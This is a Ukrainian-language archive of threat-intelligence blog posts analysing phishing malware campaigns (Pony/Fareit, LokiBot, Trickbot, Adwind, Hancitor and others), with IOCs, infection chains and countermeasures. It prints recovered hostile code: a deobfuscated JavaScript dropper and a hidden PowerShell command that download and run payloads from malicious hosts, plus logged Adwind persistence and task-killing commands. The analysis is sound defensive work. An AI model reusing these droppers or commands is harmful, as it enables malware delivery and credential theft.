Tag Archive | Pony

IOC_digest_02_2019

(Зразки за лютий 2019го)

Продовжуючи формат переднього дайджесту, ось вам перелік зразків, результати аналізу яких я можу оприлюднити:

01/02/19

розсилали #TVRat, (.pdf.scr) > %temp%\1.exe > AppData\Roaming\d4igle\svcc.exe , звіт

06/02/19

розсилали #Trickbot, .xls > macro > cmd > powershell > GET 2 URL > $env:temp+’\tmp1806.exe , звіт

07/02/19 – високий рівень складності та загрози, без EXE файлів (!)

розсилали #SobakenRAT, .lnk > powershell > get base64 > decode > fingerprint system > POST b64 on C2 , звіт

12/02/19

розсилали #Lokibot, .RAR > bat > exe , звіт

20/02/19

розсилали #shade, URL > GET .ZIP > JS > WSH > GET .jpg > %temp%\*.tmp , звіт

25/02/19

розсилали #shade, URL > GET .ZIP > JS > WSH > GET .jpg > %temp%\*.tmp , звіт

розсилали #coinminer, .SCR > C:\Intel\* , звіт

26/02/19

 

розсилали #formbook, doc1 > xml.rels > GET1 > doc2 > 11882 > GET2 > \Public\vbc.exe , звіт

27/02/19

розсилали #smokeloader, (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\??????.exe , звіт

розсилали #fareit, .doc (RTF) > 11882 > GET URL > \appdata\roaming\*.exe , звіт

– – – – – – – – – – – – – – – – – – – – – – –

Аналітика

Методи доставки

Для обходу фільтрів продовжують застосовувати такі методи:

Якщо розбити по категоріям, тоді отримаємо

Тенденції

Кампанія з розповсюдження ransomware #shade яка розпочалася ще в кінці 2018 року продовжувалась із переключенням з приєднань на посилання на JS (WSH).

Варто виділити цільову атаку із застосуванням LNK на PowerShell (#sobaken), яка проводилась без жодних exe файлів. Це той рівень, до якого усім потрібно бути готовими.

Крім того, цікавим є спосіб доставки у #formbook – два документи, перший з xml.rels, а другий із 11882.

Усе, що присилали в лютому могло створити інциденти тим організаціям які:

  • не контролюють макроси
  • не контролюють WSH
  • не королюють запуск powershell
  • не посилили фільтрацію приєднань

Узагальнені контрзаходи

Будьте уважні та обережні.

VR

IOC_Fareit_181018

18/10/18 проходила розсилка #Fareit (#Pony)

Схема:
email attach (ace) > exe > %temp%\subfolder\filename.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –

194.36.173.171  armansaykham.com    POST /nonso/gate.php HTTP/1.0                           Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

67.227.226.240  pornhouse.mobi      GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0    Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/u0D14L5r

Контрзаходи:

• Блокуйте нетипові/застарілі формати архівів
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

IOC_digest_0618

Усім привіт.

Через брак часу та велику кількість зразків надсилаю стислий дайджест того, що присилали наприкінці червня:

 

140618 

#LokiBot #lokibot

SHA-256               7df5d234ba9b5de40e8dae695471f2a0362de10177e3518eb7f9e8c172b47643
File name            PAYMENT SWIFT PDF.iso
File size 696 KB


SHA-256               1800b88ea906961b4ecfd374756cb2c7f0273c6048c04497e315224484cf659e
File name            PAYMENT SWIFT PDF.exe
File size 636 KB

 

h11p://ponsse{.} site/nzube/fre.php

104.28.26.87       ponsse{.} site     POST /nzube/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)  

 

– – – – – – – – – – –

150618

#js #grandcrab

SHA-256               85838b0cbd2beac5e91b24afbf7a36156b2270bc0c874b6377541740b74a9851
File name            20188946_894679.jpg.zip
File size 21.92 KB

SHA-256               1f26017ef432aee644400e4854e54ff330c797ea8eb79190368fed9cf630377b
File name            e233d4ac26fee5ff56a6536d0db7373217b4c4a7
File size 21.78 KB

SHA-256               eb371764b422e9384e3fb8cbb12112e64666c362758c62bcabbd9f17c7d94341
File name            crabin.exe
File size 207.51 KB

 

h11p://92.63.197{.} 60/crabin.exe?agQefX

92.63.197.60       92.63.197.60       GET /crabin.exe?agQefX HTTP/1.1                            80           HTTP      133

66.171.248.178  carder{.} bit        GET / HTTP/1.1 Mozilla/5.0

217.156.87.2       carder{.} bit        POST /eeb?eyge=ies HTTP/1.1  (application/x-www-form-urlencoded)    Mozilla/5.0

 

#Trickbot

SHA-256               5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name            75812277127A00113A.doc
File size 69 KB

 

macro > cmd > powershell > GET

 

h11p://onetimewonders{.} com/no.bin (!)

h11p://nepalhiking{.} com/no.bin (404)

 

SHA-256               503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name            no.bin   !This program cannot be run in DOS mode.
File size 338 KB

 

h11p\188.124.167.132:8082/ser0611/

 

– – – – – – – – – – –

190618

 

#adwind

SHA-256               2a6ea5647c951659854df5bc3437462294815da880872cc93e96fc01cccd85e4
File name            ORDER SAMPLE.jar
File size 479.42 KB

 

javaw.exe  197.211.59.160  pmanlog.ddns{.} net

 

proc

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind1906.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
"C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.32649732458480233098419347231064428.class
cmd.exe /C cscript.exe C:\tmp\Retrive6508158100243133376.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive3329749612520250823.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive6611168625816267695.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive35953365366553471.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v extjXQeGNff /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg\"" /f
attrib +h "C:\Users\operator\RmAnqeogmJS\*.*"
attrib +h "C:\Users\operator\RmAnqeogmJS"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.64094332285124526171507674142480917.class
cmd.exe /C cscript.exe C:\tmp\Retrive4167831113503291950.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4003874893192164925.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\UjxCMXPFhx4211656766753692948.reg
taskkill /IM Taskmgr.exe /T /F
WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
taskkill /IM PSUAMain.exe /T /F

 

comp

java.exe               1964       TCP        127.0.0.1              50131    127.0.0.1              7777       SYN_SENT

javaw.exe           2772       TCP        10.0.2.15              50102    185.208.211.142                3382       ESTABLISHED

 

#pony (fareit)

SHA-256               c0c4ad871ffe0231961fb2d77ee575c07e4ade470b0d6c84faa7f92ba511ee64
File name            decoded.gz
File size 188.51 KB



SHA-256               5dda41fb0abc6528d80995aedb47c0b59fc6467e7307bbdc75d097aef50fcd21
File name            deed.exe
File size 672 KB

 

185.6.242.251     hosedoin{.} ml   POST /fiv/roks/gate.php HTTP/1.0            Mozilla/4.0

 

– – – – – – – – – – –

200618

#adwind #jar

 

proc

—-

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind20.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.54780904655995994375189407378187035.class
cmd.exe /C cscript.exe C:\tmp\Retrive6543292869224297367.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4922912961062946918.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive2680843125772440624.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive8763095501247174336.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ZllOQijdfpg /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR\"" /f
attrib +h "C:\Users\operator\VGyRmlBYozs\*.*"
attrib +h "C:\Users\operator\VGyRmlBYozs"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.7762377356869443373969133677298847.class
cmd.exe /C cscript.exe C:\tmp\Retrive5882107392697143603.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive1289986287422620902.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\DpVePFPaGi2225327046919394054.reg
taskkill /IM Taskmgr.exe /T /F

 

comp

—-

java.exe               3740       TCP        127.0.0.1              50177    127.0.0.1              7777       SYN_SENT

javaw.exe           3136       TCP        10.0.2.15              50176    185.208.211.138                4573       SYN_SENT

 

#pony #fareit

SHA-256               b3468cc1949f8686bd2bc8bda351dc4b31a45f9fcf6c2ea27279421c4465c431
File name            HSBC COPY.docx - clean
File size 76.05 KB


SHA-256               64fd95c4c13fadee7b5fbbe946f0bd66cce07a5a6488c2bc95faefb0098aa97d
File name            PAYMENTCOPY_PDF.exe
File size 50.55 MB

 

h11p://cellimark{.} com/yangzhouming/coreserver/gate.php

h11p://cellimark{.} com/yangzhouming/coreserver/shit.exe  – 404

 

103.63.2.238       cellimark{.} com                POST /yangzhouming/coreserver/gate.php HTTP/1.0       Mozilla/4.0

103.63.2.238       cellimark{.} com                GET /yangzhouming/coreserver/shit.exe HTTP/1.0            Mozilla/4.0                 – 404

– – – – – – – – – – –

Контрзаходи незмінні.

Хто забув чи не знав – дивіться попередні звіти по цим сімействам:

 

#LokiBot              https://radetskiy.wordpress.com/?s=lokibot

#TrickBot             https://radetskiy.wordpress.com/?s=trickbot

#Adwind              https://radetskiy.wordpress.com/?s=adwind

#Pony                   https://radetskiy.wordpress.com/?s=pony

 

Вдалого дня.

Будьте уважні та обережні!

VR

IOC_Pony_030518

Доброго вечора, панове.

Вчора була зафіксована розсилка троянського коду типу #Pony (за альтернативною класифікацією – #Fareit)

Цей тип шкідливого коду застосовується для крадіжки збережених паролів. Ми вже розбирали його варіант 27/02.

Рівень загрози, для організацій котрі не мають оновлень вразливості MS Office 2017-0199, – високий.

Станом на 16:00 4/05 джерело досі активне!

А для тих, хто уважно читає наші поради – низький.

Користувачі захисту кінцевих точок McAfee, зверніть увагу, документ та Payload перехоплюються по DAT.

Трохи аналітики:

  • RTF > 2017-0199 > HTA > PowerShell > EXE
  • Payload не кодований (This program must be run under Win32)
  • Завантаження HTA файлу засобами Winword
  • Завантаження та запуск основної частини відбувається засобами PowerShell
  • Інструкція для PowerShell кодовані, виклик прихований та обфускований (ключі -ex BYPass -NOP -w hiddeN -ec )
  • Payload зберігається і запускається з чітко прописаним іменем і шляхом (AppdAta\carin.exe)
  • Перевірка параметрів системи
  • Спроб закріплень не проводив – запустився, спробував передати і завершив себе
  • Не потребує прав Адміністратора

І так, проблеми будуть у тих, хто:

  • Не застосували виправлення 2017-0199
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • Не заборонили прихований виклик powershell та кодовані команди (більше 50% організацій)
  • Не заборонили трафік для powershell (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

email > Attach (.doc = RTF) > GET ifeoma/htabuk.hta > mshta.exe > Powershell > GET /ifeoma/buk.exe > AppdAta\carin.exe

Файл приманка, справжній тип – RTF

RTF документ містить посилання на HTA файл

Джерело HTA та Payload (станом на 16:00 4/05 досі активне!)

Схема інфікування (включно із winword)

Схема інфікування (тільки powershell)

Маркери IOC:

файл приманка (RTF із вразливістю 2017-0199 )

SHA-256        b2d64492b92ce1d794b9d832b76f91c456f86498d512eb227164a58b6c0d833a
File name   revised invoice.doc
File size      221.6 KB

Ініціює завантаження HTA при відкритті

h11p://dhm-mhn{.} com/ifeoma/htabuk.hta

HTA файл з кодованими інструкціями для PowerShell

SHA-256        ae6a2f89c47aad291662d44db21f6cdd78e649c6027996247779cf02cc13ae5f
File name   htabuk.hta
File size      2.29 KB

Обробка НТА інструкцій викликає завантаження через PowerShell

h11p://www.dhm-mhn{.} com/ifeoma/buk.exe

Основна частина #Pony

SHA-256    c81a6211b9f1fbfc5c0b46151c29879f285a70b7a82d3cf2f262d96865a7fd82
File name   buk.exe    >>    AppdAta\carin.exe
File size      595.5 KB

Забрані паролі публікуються тут

h11p://detailingpro.co{.} in/wp-includes/panelnew/gate.php

Мережеві IOC:

108.167.172.151        dhm-mhn{.} com        Mozilla/4.0          GET /ifeoma/htabuk.hta 
108.167.172.151        dhm-mhn{.} com                                GET /ifeoma/buk.exe 
103.250.185.138        detailingpro.co.in         Mozilla/4.0          POST /wp-includes/panelnew/gate.php

Активність по процесам:

Коли жертва відкриває RTF документ-приманку winword завантажує HTA файл.

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\mshta.exe -Embedding

HTA файл містить кодовані інструкції:

@encoded (base64)

IAAMACAAUwBlAHQALQBDAG8AbgB0AEUAbgB0AAkA…==

@decoded


 � �S�e�t�-�C�o�n�t�E�n�t�       �      �      �-�v�A� � � �(�   �
 � �n�E�w�-�o�B�J�e�c�t� �

@deobfuscated

Set-ContEnt-vA ( nEw-oBJect sYstem.NET.WeBCLiEnT).
DoWNloAdDATa(  h11p://dhm-mhn{.} com/ifeoma/buk.exe)-En
BYTe-PAth   $ENv:aPPDATa\carin.exe ; sTaRt$Env:AppdAta\carin.exe

Обробка HTA призводить до виклику PowerShell який завантажує та запускає основну частину:

"C:\Windows\sysTEM32\WINdOWsPoWeRShELL\v1.0\pOWershElL.eXe"  "  POWerShElL.EXE  -ex  BYPass -NOP -w        hiddeN  -ec        IAAMACAAUwBlAHQALQBDAG8AbgB0AE…

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -ex BYPass -NOP -w hiddeN -ec IAAMACAAUwBlAHQAL…

"C:\Users\operator\AppData\Roaming\carin.exe"

Після запуску зразок намагається з’єднатися із C2, спроб закріплень не проводив

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність наданих вище маркерів
  • Відмова від використання RTF формату як застарілого та вразливого
  • Розгортання виправлень вразливості MS Office 2017-0199
  • Заборона мережевої активності для додатків MS Office та mshta.exe – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборона завантаження HTA файлів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона прихованого виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_pony_270218

Доброго ранку, панове.

Вчора в першій половині дня було зафіксовано розсилку троянського коду типу Pony.

Рівень загрози – середній. Для тих, хто врахував наші рекомендації стосовно обробки скриптів (WSH) – низький.

Користувачі захисту кінцевих точок McAfee зверніть увагу – dropper та payload детектуються по GTI/DAT.

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці .lzh (насправді RAR v4)
  • Скрипт містить дві адреси, а основна частина записується з довільним іменем файлу
  • Завантаження основної частини відбувається засобами WSCript.exe
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Даний тип ШПЗ застосовується для збору інформації та крадіжки облікових даних

 

Схема атаки:

email > Attach (LZH) > JS > WSCRIPT > 2 hardcoded URL > GET > AppData\Roaming\Microsoft\Windows\Templates\123456.exe (752787.exe; 909515.exe)

 

#Маркери по файлам, IOC:

 

Приєднання (архів):

SHA-256    874851b1f11a7ab9d1219293eaad0f975afb1555a49fbfbf43061f5f50758446
File name   Заявка февраль.lzh
File size      3.41 KB

 

скрипт приманка:

SHA-256        05b2ce6671cdbe5985dec10b6d09e0413111ff6cc026d70578048aee4e9bd5a6
File name   Заявка февраль.js
File size      14.83 KB

деобфускований скрипт:

dropper_script: var wsh = new ActiveXObject(“wscript.shell”); var path = wsh.SpecialFolders(“templates”)+”\\”+((Math.random()*999999)+9999|0)+”.exe“; try { var HTTP = new ActiveXObject(“MSXML2.XMLHTTP”); var sh = new ActiveXObject(“shell.application”); var Stream = new ActiveXObject(“ADODB.Stream”); HTTP.Open(“GET”, “h11p:\blogprinter{.} net/wp-content/uploads/2018/02/Plink.exe“, false); HTTP.Send(); if (HTTP.Status == 200) { Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody); Stream.Position = 0; Stream.SaveToFile(path, 2); Stream.Close(); sh.ShellExecute(path, “”, “”, “open”, 1); } else { HTTP.Open(“GET”, “h11p:\ford-alarm-motors{.} ru/new/Plink.exe“, false); HTTP.Send(); if (HTTP.Status == 200) { Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody); Stream.Position = 0; Stream.SaveToFile(path, 2); Stream.Close(); sh.ShellExecute(path, “”, “”, “open”, 1); } }} catch(e) {}

основна частина:

SHA-256        78dae10762c946ce16b00cecdc2b2d94269892638870ea7a16f492c247b53f57l
File name   Plink.exe >> AppData\Roaming\Microsoft\Windows\Templates\(random_6).exe (752787.exe 909515.exe)
File size      60 KB

 

DLL:

SHA-256    8df388d10a92699f190808e81a35a3afdd50ab1d9afca418f6142d4cc3cfcde8
File name   fhmivfb.dll >> AppData\Roaming\zxponrg.dll
File size      105.5 KB

 

#Мережеві IOC:

завантаження payload – станом на 10ту ранку 28/02/18 досі активні!

107.150.61.242   HTTP 391   blogprinter{.} net   GET /wp-content/uploads/2018/02/Plink.exe HTTP/1.1

або

87.242.73.90      HTTP 299   ford-alarm-motors{.} ru  GET /new/Plink.exe HTTP/1.1

 

трафік скомпрометованої системи – сервер контролю

88.119.179.237   HTTP 420   toolbarqueries{.} google.com GET http://toolbarqueries.google{.} com/search?sourceid=navclient-ff&features=Rank&client=navclient-auto-ff&ch=
87.120.37.42      HTTP 1342 gmail{.} com      POST http://gmail{.} com/upload.php HTTP/1.1  (JPEG JFIF image)[Malformed Packet]
185.99.132.113   HTTP 564   185.99.132.113   POST /g/g.php HTTP/1.0
185.99.132.113   HTTP 1355 gmail{.} com      POST http://gmail{.} com/upload.php HTTP/1.1  (JPEG JFIF image)

ситауція по вілдкритим портам після закріплення:

264837.exe 1416 TCP 10.0.2.15 53121 87.120.37.42 80 ESTABLISHED 
rundll32.exe 988 TCP 10.0.2.15 53117 54.236.38.98 53 SYN_SENT 
[System Process] 0 TCP 10.0.2.15 53118 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49406 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49405 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49403 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49402 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49399 88.119.179.237 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49407 87.120.37.42 80 TIME_WAIT

#Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами WSCript:

 

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Заявка февраль.js"

"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\264837.exe"

 

Закріплення через розпаковану DLL:

 

C:\Windows\SysWOW64\rundll32.exe  rundll32 "C:\Users\operator\AppData\Roaming\zxponrg.dll",SVCServiceMain uzgmelroj INS2

uzgmelroj                   c:\users\operator\appdata\roaming\zxponrg.dll        18.02.2018 22:06        19/67

"C:\Windows\SysWOW64\svchost.exe"

 

Самознищення із затримкою після передачі даних:

"C:\Windows\system32\cmd.exe" /c ping -n 1 127.0.0.1 && del "C:\Users\operator\AppData\Roaming\MICROS~1\Windows\TEMPLA~1\264837.exe" >> NUL

ping  -n 1 127.0.0.1

 

#Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WSCript та CSCript (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !

Користуючись нагодою, нагадую що ENS 10.5 має вбудоване правило для обмеження запуску скриптів, але воно не активоване по замовчуванню:

Або ж можна створити власне правило із такою умовою:

  • Посилена фільтрація запускних та скриптових файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_hancitor_250517

Підступний “Google Docs”. Уважно читайте адресу посилання, а не текст на ньому!

Вчора (25го травня) в другій половині дня була зафіксована розсилка Hancitor (Chanitor).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Вперше його розсилки було зафіксовано в січні 2017.
Ступінь загрози – середній. Вразливосте не використовує. Активація відбувається через запуск макросів.

Зверніть увагу на такі деталі:
– Документ генерується із іменем домену жертви (як і поле теми фішингового листа).
– Після успішного інфікування доставка основних модулів здійснюється із затримкою (30-40 хв).

Схема роботи:
– – – – – – – – – – – – –

email > URL > DOC > macro > URL > EXE > downloader

Маркери (IOC):
– – – – – – – – – – – – –

#1 email

Received: from homewatchohio.com [74.142.241.82]

Заголовки листів містять:
From: “Google Docs” <accountant@%company%.com>
Subject: %домен жертви% has sent you a document through Google Docs!

#2 URL

h11p://freeholdsurg.com/viewdoc/file.php?document={base64string} [46.173.218.143]

Ініші сервери з яких розповсюджується документ з макросами:
h11p://hazletfamilycare.com/viewdoc/file.php?document=
h11p://freeholdretractor.com/viewdoc/file.php?document=
h11p://freeholdsurgical.info/viewdoc/file.php?document=
h11p://homesmartfinancial.com/viewdoc/file.php?document=
h11p://freeholdsurg.com/viewdoc/file.php?document=
h11p://execps.com/viewdoc/file.php?document=
h11p://bioremediation-products.com/viewdoc/file.php?document=
h11p://strategic-ls.net/viewdoc/file.php?document=
h11p://cindysgraphicdesigns.com/viewdoc/file.php?document=

#3 DOC із макросом

Документи мають назву по шаблону:

Billing_%домен жертви%.doc

File Name Billing_noname.com.doc
MD5 Hash Identifier 89CEA54551FBF7C71058A7DE6322934D
SHA-1 Hash Identifier 2BF315F4FCB4A36924E64E4AD2F5A6BA8D07C06D
SHA-256 Hash Identifier 0CF705E4804F3585E44368E8D611DDB9376863FF8C4400D156D043F6B181924E
File Size 206336 bytes
File Type Composite Document File V2 Document, Microsoft Office Word

Макрос при активації відкриває з’єднання із такими серверами:

212.129.51.160
h11p://API.IPIFY.ORG – перевірка зовнішнього IP
h11p://FORDEBUBUT.COM [212.129.51.160] – завантаження EXE
h11p://GREGORYRULLO.COM – зламані сайти із скриптами
h11p://REWNINGIDEN.COM [185.118.66.252] – 2C
h11p://WWW.HOMESDECORATINGIDEAS.COM – зламані сайти із скриптами

#4 EXE

File Name BND2B1.tmp
MD5 Hash Identifier AF7078278C943D35BD910989865857E5
SHA-1 Hash Identifier BD60C974AB62E65D98DD322A461F0DCBBB0A30AB
SHA-256 Hash Identifier ACEBA8DB5676FD88C2EE3C63D99A6EF1A1B54D740AC25C2E6F4195EF08DB0CC6
File Size 193536 bytes

Після запуску відкриває з’єднання із :

REWNINGIDEN.COM [185.118.66.252]

#5 Мережевий трафік із скомпрометованої системи

h11p://fordebubut.com 212.129.51.160
h11p://gregoryrullo.com 50.62.110.1
h11p://homesdecoratingideas.com 192.196.156.150
h11p://rewningiden.com 185.118.66.252
h11p://kedrolhechedt.com 92.242.40.92
h11p://dijussoda.com 185.66.9.164
h11p://api.ipify.org 54.225.154.40, 54.243.147.114, 107.21.113.24, 23.23.102.58, 23.23.120.37, 50.19.238.1

# # #

Рекомендації:
– – – – – – – – – – – – –

1) Перевірка спроб з’єднань із такими ресурсами та внесення їх у чорний список:

  • h11p://FREEHOLDSURG.COM [46.173.218.143]
  • h11p://FORDEBUBUT.COM [212.129.51.160]
  • h11p://REWNINGIDEN.COM [185.118.66.252]

2) Відключення макросів у пакеті MS Office через GPO

3) Фільтрація каналів доставки (web та email) на предмет макросів, скриптів та ін.

4) Заборона створення та запуску нових .tmp та .exe файлів у каталозі %AppData%

5) Співбесіди на тему фішингу, соц інженерії

6) Застосування “пісочниці”

7) Перевірити налаштування GTI на кінцевих точках, т.к. основне тіло детектується антивірусом (див. KB53733)

Будьте уважні та обережні.

VR